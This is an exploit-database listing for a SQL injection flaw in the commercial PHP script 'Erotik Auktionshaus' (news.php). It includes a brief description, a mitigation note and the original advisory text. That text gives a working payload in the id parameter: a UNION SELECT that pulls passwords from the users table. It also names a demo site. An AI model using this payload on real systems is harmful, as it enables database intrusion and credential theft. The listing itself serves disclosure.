header-logo
Suggest Exploit
vendor:
news.php
by:
ea$y laster
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: news.php
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Unknown

Erotik Auktionshaus SQL Injection news.php exploit

The Erotik Auktionshaus news.php script is vulnerable to SQL injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the server, which will then execute the malicious SQL query. This can be used to gain access to sensitive information such as passwords and other confidential data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

 ########################################################################
 ##Erotik Auktionshaus SQL Injection news.php                          ##
 ########################################################################
 ########################################################################
 ## _                     _     _                   _                  ##
 ##| |_ ___ ___ _____ ___|_|___| |_ ___ ___ ___ ___| |_                ##
 ##|  _| -_| .'|     |___| |   |  _| -_|  _|   | -_|  _|               ##
 ##|_| |___|__,|_|_|_|   |_|_|_|_| |___|_| |_|_|___|_|                 ##
 ##                                                                    ##
 ########################################################################
##########################################################################
#Script: Erotik Auktionshaus news.php                                    #
#Vulnerabilities [ SQL Injection ]                                       #
#Language: [ PHP ]                                                       #
#Download: [ buy this script ]                                           #
#Founder: [ ea$y laster ]                                                #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ]  #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-]                       #
#Price: [ Commercial License EUR 149.00 €                                #
#DEMO : http://xmedien.e-ee.de/auktion-e/                                #
#############################################################################
#http://server/news.php?id=-1+union+select+1,2,password,4,5+from+users+--#
#############################################################################